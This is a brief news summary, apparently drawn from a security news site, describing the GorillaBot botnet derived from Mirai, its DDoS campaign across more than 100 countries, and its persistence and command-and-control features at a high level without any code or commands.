A new malware family called Gorilla (GorillaBot) has been discovered that is linked to the leaked Mirai botnet source code. This variant of the malware was identified by cybersecurity firm NSFOCUS last month and has issued over 300,000 attack commands with a high density between September 4 and September 27.
The GorillaBot targets over 100 countries, including universities, government websites, banks, and gaming sectors. China, the US, Canada, and Germany are among the most attacked countries. The malware uses UDP flood and other DDoS attack methods to conduct attacks, which can spoof arbitrary source IP addresses due to the connectionless nature of the UDP protocol.
The GorillaBot also comes with capabilities to connect to predefined command-and-control servers, making it easy for attackers to execute commands remotely. Furthermore, the malware embeds functions that exploit a security flaw in Apache Hadoop YARN RPC to achieve remote code execution.
To maintain persistence on infected hosts, the malware creates a service file that runs automatically during system startup and downloads a shell script from a remote server. This allows the malware to spread and remain dormant until triggered by an attacker.
NSFOCUS describes GorillaBot as introducing various DDoS attack methods and employing encryption algorithms commonly used by other malicious groups to hide key information, while also maintaining long-term control over IoT devices and cloud hosts with multiple counter-detection techniques.
Source: https://thehackernews.com/2024/10/new-gorilla-botnet-launches-over-300000.html?m=1